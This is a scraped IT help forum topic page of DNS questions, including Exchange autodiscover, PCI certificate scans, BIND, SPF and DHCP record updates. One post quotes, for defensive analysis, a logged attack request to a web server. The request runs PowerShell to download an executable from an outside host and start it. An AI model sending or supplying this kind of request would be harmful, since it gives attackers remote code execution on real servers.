DNS

26K

Solutions

26K

Contributors

The Domain Name System (DNS) is a hierarchical, globally distributed system responsible for associating the name of a computer, service or other resource into an IP address for connecting to the Internet or a private network. Most prominently, it translates domain names to the numerical IP addresses needed for the purpose of computer services and devices worldwide.

Share tech news, updates, or what's on your mind.

Sign up to Post

Hi Folks,
So a couple of my websites on my domain are getting flagged for phishing on virustotal.com. I need to go through the delisting process and cannot find where I should do that. This is happening with AegisLab WebGuard and CyRadar specifically. Can anyone point me toward the resource to do that?
0
I'm having trouble setting up autodiscover for our Exchange 2013 infrastructure. We have two domains, let's call them domain.co.uk and domain.com and both of these should be serviced by the same server, which is set up at mail.domain.co.uk.

Autodiscover on Exchange is set up correctly for domain.co.uk and the certificate that the Exchange server presents is a wildcard certificate for *.domain.co.uk. Therefore when you add email@domain.co.uk to one of our corporate mobile phones, it gets all of the user settings and correctly sets the phone up automatically.

Autodiscover for domain.com does not work under the same scenario. It reports that it cannot verify the account. If you enter the information manually, it works.

DNS is set up thus:

autodiscover.domain.co.uk 3600 IN CNAME mail.domain.co.uk
_autodiscover._tcp.domain.co.uk 300 IN SRV 0 0 443 mail.domain.co.uk

_autodiscover._tcp.domain.com 300 IN SRV 0 0 443 autodiscover.domain.co.uk

Microsoft's Remote Connectivity Analyser says that all is well. Can anyone shed any light on what I might have set up incorrectly?

Thanks in advance.

Phil
0
We recently switched from an Exchange Server 2010 (on premises) to an Exchange Server 2016 (on premises).

A co-worker (Cory) is part of a group where people post messages to it, and others respond to the "posts".
Her "sent" emails to the group, are staying in our Exchange 2016 queue for 48 hours, then not delivered.

For example,

Identity: VMEXCHANGE\3\5295694675989
Subject: RE: The client's case is ready for review.
Internet Message ID: <3107f8236ceb47e8a6c96e1e1d3@mydomain2.com>

From Address: Cory@mydomain2.com
Status: Retry
Size (KB): 16
Message Source Name: SMTP:Default VMEXCHANGE

Source IP: 192.xxx.x.xxx
SCL: -1

Date Received: 3/23/2019 4:10:24 PM
Expiration Time: 3/25/2019 4:10:24 PM

Last Error: 450 4.1.8 <Cory@mydomain2.com>: Sender address rejected: Domain not found
Queue ID: VMEXCHANGE\3

Recipients:  discuss@mainstoranges.info;3;2;
{LED=450 4.1.8 <Cory@mydomain2.com>: Sender address rejected: Domain not found};{MSG=};{FQDN=};{IP=}; LRT=}];0;CN=Default,CN=Connections,CN=Exchange Routing Group (DWBGZMFD01),CN=Routing Groups,CN=Exchange Administrative Group (FYDIBOHF23),CN=Administrative Groups,CN=First Organization,CN=Microsoft Exchange,CN=Services,CN=Configuration,DC=TD,DC=local;0

Note:  We have 2 internet domains names that "point" to the same Exchange Server 2016 (mydomain1.com, mydomain2.com).  Most of us in the firm use mydomain1.com (as sender and reply to address).  Cory (and 4 other co-workers) use mydomain2.com (in the …
0
Our company needs to have external PCI scans done on both our website and our company firewalls.    The website is hosted by an external company and we have 3 firewalls at different sites witch are managed locally.  

We are failing our PCI scan because the certificates on the firewalls are not trusted.   We were originally using  self-signed certificates but to get rid of this message I purchased one from GoDaddy for one of our sites.    

I created the CSR on the firewall for fw1.MySite.org and installed in on the firewall.  Since the scan is done by IP, I added an A record with our DNS provider so it would resolve correctly.   However we are still failing our scan with "SSL Certificate Common Name Does Not Validate (External Scan)"  and "Untrusted Certificate".  

I have made sure that if I do a nslookup for fw1.MySite.org it resolves to 456.4457.458.459 which is the IP address of the firewall.  However since the scan is done by IP and it is still failing.   I tried doing a nslookup 456.4457.458.459 and it returns MySite.org and not fw1.MySite.org.

How is it resolving by IP address to the website and not the fw1.MySite.org?   How do I get it to resolve to fw1.MySite.org?  


A Records (IP Address)
Host      TTL      Numeric IP
www      3600      123.124.125.126
@ (None)      3600      123.124.125.126
* (All Others)      3600      234.235.236.237
ecommerce.MySite.org      7200      234.235.236.237
ftp.MySite.org      7200      345.346.347.348
mail.MySite.org      7200      345.346.347.349
pottery.MySite.org      7200      …
0
I am trying to whitelist youtube on OpenDNS.  I whitelisted the youtube and the site shows up, but unfortunately the videos don't play.  What URLs do I need to whitelist in order to fully open up youtube?
0
I have a computer at work that belonged to a different domain and when I try to join it to our domain the option is grayed out and a message says, "The identification of the computer cannot change because the workstation servise is not running. Open the services snap-in to insure it is running ans set its startup type as "automatic". When I try to do this I get a message that "Windows could not start the workstation service. The system cannot find the file specified."

Do you know how to proceed?

Thanks,
Claude
Domain-change.JPG
0
I have an SBS2011 server that it did a scheduled reboot this morning and when it did so, DNS will not start and Exchange services would start.

I have done some research and it seems that the DC/DNS server has lost its Secure channel with itself or PDC.

I have disabled IPV6 and also stopped the KDC service and ran the "netdom resetpwd /server:192.168.1.2 /userd:<Domain\domain_admin> /passwordd:*"

I get this error:
The command failed to complete successfully.

I cannot get the command to complete!  I need help.

Here are dcdiag results and ipconfig /all

nltest/sc_query:SBSDomainC.local
I_NetLogonControl failed: Status = 1355 0x54b ERROR_NO_SUCH_DOMAIN

Since this an SBS Server I don't know where to turn beside restoring the OS drive with last nights backup using a BareMetalRestore.  Any suggestions??
DCDiag.txt
IPConfigAll.txt
0
Can I install Exchange 2013 in a Exchange 2007 SP3 (2008 DFL/FFL) environment, if I set the virtual directories properly?  I'd like that to be the first step and then install Exchange 2013 and configure mail to flow through there the next day.  I understand the DNS and Cert (legacy, mail, autodiscover) requirements.  Plan is to set the DNS up, all pointing to 07, then the next day install and setup 13.  Then setup the virtual directories and DNS to allow for 13 to proxy to 07.  Would that work out smoothly with no impact to my users (local/remote)?
0
I have domains already added to office 365 and I scarified ownership. Why hybrid configuration wizard gives new txt records to add to dns to a rift the domains again?
0
With my little powershell command i try to get CNAME record from domain.
When i execute this command <Get-DnsServerResourceRecord -ZoneName "ccsmtl.lab" -RRType CName -ComputerName S-ADS001> i have all information. But when it comes to filter to have specific result there is no information for this command <Get-DnsServerResourceRecord -ZoneName "ccsmtl.lab" -RRType CName -ComputerName S-ADS001 | Where {$_.RecordData -like "S-SUBCA001*"}>
In the attached file I put the screenshot of the results of the console powershell
CNameOutPut.txt
1
I'm about linux dns (bind9).

In the corresponding configuration file for bind I have configured dynamic DNS forwarder (namebench).

My question is: how can I find out which forwarder bind9 actually uses?
0
Windows Server unable to resolve external DNS values until a reboot.
- Once rebooted it will resolve and act normal for several days; then stop resolving external values again.  Can get into the server via RDP from another machine locally and perform the following troubleshooting methods:

Reviewed the event logs for Critical, Errors, and Warnings.  No critical items; Errors related to DNS as follow:

- DNS Server Event ID: 4015 "The DNS server has encountered a critical error from the Active Directory. Check that the Active Directory is functioning properly. The extended error debug information (which may be empty) is "". The event data contains the error."
  * Have reviewed the DNS settings:
    *  Domain controller points to the PDC then to itself to resolve DNS.
    *  Perform a ping to "www.google.com" - RESPONSE: Ping request could not find host www.google.com. Please check the name and try again.  |  ping the IP: 172.217.5.68 get a response no problem, the IP is resolved by another machine that got the IP from a response to www.google.com

- Run from an elevated prompt: dcdiag /test:DNS /e /v >LOGFILE  the results are as follow on the effected Server DC01
  Domain          Auth   Basc   Forw   Del      Dyn     RReg   Ext
  DC00              PASS   WARN FAIL   FAIL     PASS   PASS   n/a
  DC01              PASS   WARN FAIL   FAIL     PASS   PASS   n/a

- Run the same from the server DC00 get the following results:
  Domain          Auth   Basc   Forw   …
0
I have a Raspberry Pi that functions as a print server. It runs CUPS and it has a static IP Address. With Bind I am mapping the server to the domain 'printer.home'. I also have reverse DNS configured for 'printer.home'.

I would like to use this Raspberry Pi to host a local website - a dynamic website that lets users browse records that I have. I would like to give it the domain 'records.home'. I guess it will be no problem creating another A record for the same IP Address and 'records.home'. But what about the reverse record? Do I just omit it for this domain?
0
I'd like to have a subdomain or something similar(CNAME?) of a domain that I own redirected to an Amazon S3 htm file without the user seeing the name of the S3 file in the address bar when the user is redirected. (Godaddy called this "masking"). all while the subdomain address shows SSL Encryption.

i.e. I would like:
https://vtours-salonstyle3.urbsee.work 

to redirect to:
https://s3.amazonaws.com/v-tours/Canton+Museaum+of+Art/Salon+Style+2/Tablet+%26+Web+Files/index.htm 
..........................

I've attempted:
Creating a custom bucket in S3 that is the same name as my domain name, then going to Route 53 to get the naming servers, and changing the nameservers for urbsee.work in Godaddy to Route 53 nameservers so I can point Route 53 to S3 files.

This didn't work for me. So I...

Looked at setting up CloudFront to serve HTTPS requests to my Amazon S3 buckets...
.................................................................................
I've been instructed to to this:
"- Since your files in bucket "v-tours" reside inside folder "Canton Museaum of Art/Salon Style 2/Tablet & Web Files", you should use this as value for 'Origin Path'.

In step 5, you should choose 'redirect HTTP to HTTPS' so that HTTP requests from client will be redirected to HTTPS by CloudFront.

As you are using custom domain "vtours-salonstyle3.urbsee.work ", you must use this value for 'Alternate Domain Names (CNAMEs)'. Also, kindly install a custom certificate on CloudFront…
0
I am in the process of changing out a file server.  It is the only server on the network.
Access to the internet is through a WatchGuard XM25 appliance
The Domain name is the same, but the DNS has changed.  The WatchGuard provided internet connection for a few minutes, and now there is no internet connection.  I can remote into the network with the WatchGuard SSL-VPN utility, and access the computers.  

Any thoughts on why I cannot access the internet from behind the WatchGuard Appliance?

The old server was 2008R2 and the new server is 2016Standard
0
Hello - I am reading that an auto-discover record is required now for Outlook 2016/19 to connect to your Exchange Server.  I need to understand if this pertains to BOTH Exchange Online AND Exchange Server (on prem)? or are they just meaning for Exchange ONLINE only, an autodiscover record is needed in DNS?  The specify the format of the record as "autodiscover.domain.com", which would only apply to Internet searches, and not within our internal network, correct?  Looking for some clarification on this, as to what do I need for my clients on my network internally to find the Excahnge Server locally.  

Thank you,
Damian
0
I asked this before and like to expand a bit deeper.  
 For some reason we have two DNS partitions.  company.com and company.local
No immediate problems to resolve, but there is potential for corruption.  My thoughts to remove it completely but like to research first.
The zone shows up on all Domain Controllers, but for some reason the replication is only pushed out via one particular.  All DCs replicate 5 partitions, but that one replicates 7.  The additional 2 are the partitions related to company.local
Its behaving like old 2003 AD partition where we only had single source replication from the PDC.  Could that be because I have all the FSMO roles on that DC?
0
I have a primary DNS with Windows 2008 R2 Standard named DNS01.MYDOMAIN.COM and adding now 2 new DNS servers with Windows 2016.
None of these 3 server have active directory because they will be used exclusively for resolving public names pointing to our servers (such as our mail, some webservices, some webpages, etc.).


These 2 new DNS servers with Windows 2016 with the DNS roles will be used as the "backup" or "failover" servers (these new 2 servers will be physically in another location) and they are (for now) named NEW-DNS02.MYDOMAIN.COM and NEW-DNS03.MYDOMAIN.COM.
NOTE: None of these 3 servers belong to any Domain Controller. They are all standalone servers with the sole purpose of resolving names on my network.


When I am adding in the Name Servers tab of the primary DNS (DNS01.MYDOMAIN.COM), I am typing the name NEW-DNS02.MYDOMAIN.COM as the FQDN and click RESOLVE. While resolving it does bring the correct public IP and shows VALIDATING. But after a minute it brings “A timeout occurred during validation.”. Even with this error, it seems it added the record.
-      Should I ignore this error at the end?


While trying to figure out the error, I typed the internal IP of the NEW-DNS02.MYDOMAIN.COM just below the space where I type the FQDN, the validation shows OK and turns green, but the OK button is not enabled.
So with these last discovery, I created a new A record with the name TEST-DNS02.MYDOMAIN.COM with the Internal IP and tried again using …
1
I currently have a surface pro in my possession running Windows 10.   The wireless network adapter is connected using DHCP (both IP and DNS) as another laptop to the same internal network.   I have disabled all VPN clients and the internal wireless nic on the surface pro is getting the correct internal address.    

However when I attempt to ping the dc controller which is on the same internal subnet on the working machine the ping returns the internal local address of the DC.  When I attempt to ping it from the surface pro its attempting to ping an external dns with an external IP constantly and I am unable to unc to the server because of it.   I have flushed and re-registered the DNS rebooted reconnected to the internal WIFI with no luck.   Any thoughts?
0
With lots of DNS solutions out there I have a question

What are the Best to use for Cell phones and Tablets to secure thier browsing

and give them an additional level of Security

Cjoego
0
Hello.

I have a Master/Slave DNS setup using Bind9 and RNDC on Centos7.  It is working properly and zones are being replicated from the master server to the slave server when created.  When a zone is deleted from the master, the RNDC command deletes the zone from the .nzf file correctly, however the actual zone file containing the records is left on the slave servers forever.  Is there a way to make BIND clean up after itself for all discovered zone files which arent defined in slave .nzf file?  I should clarify that I don't have the option to edit the rndc commands which are fired from the master server as it is not in my control.  So maybe a script that would crawl the conf file daily and remove any zone files in /var/named/  which are not referenced in the .nzf file?

Thanks
0
Hi,

Could someone please explain the practical difference between these two dns settings in DHCP?
DHCP-DNS-config.PNG
I am currently set to "Dynamically update DNS records only if requested by DHCP" but I have read that best practice is to use "Always dynamically update DNS and PTR records"

 Why should I do this? I do see many duplicate/old A records in my DNS. Will changing the setting to "always" stop these duplicate records?
old-duplicate-dns-records.PNG
Thank you very much
0
I've noticed that all of my web servers were logging this block below from my host intrusion prevention system.  For privacy, assume this particular webserver has a dns name of zeus.xyzcorp.com

zeus.xyzcorp.com/public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://a46.bulehero.in/download.exe','C:/8.exe');start%20C:/8.exe

Is this bot just a crafted URL request being thrown at my webserver in hopes that it is vulnerable to run a powershell script that will make it reach out and download + execute something? Which exploit would this be targetting?
0
Hi,

We are using web server to send emails to different users (gmail/hotmail/yahoo and other domains). Email related to daily stock exchange rate.
Everything is working fine except few (20 out of 150) gmail user didn't receive email and we received below NDR.
Domain (exacmple: abc.com.au) is configure on Exchange server 2016. When we send those emails via exchange server we didn't face any issue but when sending via web server we received below NDR.

More Information:
Exchange server have public IP and WebServer server also have public IP. Both servers are not same network. Exchange server in office and Web server on cloud {dedicated server (VPS)}. Please review the SPF record is fine? Kindly review the attach image from mxtoolbox related to SPF record.

v=spf1 ip4:exchange public IP/27 ip4:webserver public IP mx:abc.com.au ~all

Note:
I replace the exchange public IP, Same with Webserver public IP and domain name with abc.com.au

NDR:
This is an automatically generated Delivery Status Notification.
Unable to deliver message to the following recipients, due to being unable to connect successfully to the destination mail server.
user@gmail.com

Logs:

2019-01-16 00:16:17 74.125.129.26 OutboundConnectionCommand SMTPSVC1 SFWEBSERVER - 25 MAIL - FROM:<user@abc.com.au>+SIZE=6949 0 0 375 - -
2019-01-16 00:16:17 74.125.129.26 OutboundConnectionResponse SMTPSVC1 SFWEBSERVER - 25 - - 250+2.1.0+OK+d19si2567563iom.84+-+gsmtp 0 0 563 - -
2019-01-16 

Open in new window

0
We're setting up a new O365 tenant, migrating an existing email domain to O365.

To pre-stage accounts, we need to verify ownership of the domain.

Can we verify ownership of domain with TXT file or code for O365 but leave the MX record in place with the current DNS provider?  That way, we can add accounts ahead of time but leave mail uninterrupted until we are ready to change MX over?  

Thanks in advance!
0

DNS

26K

Solutions

26K

Contributors

The Domain Name System (DNS) is a hierarchical, globally distributed system responsible for associating the name of a computer, service or other resource into an IP address for connecting to the Internet or a private network. Most prominently, it translates domain names to the numerical IP addresses needed for the purpose of computer services and devices worldwide.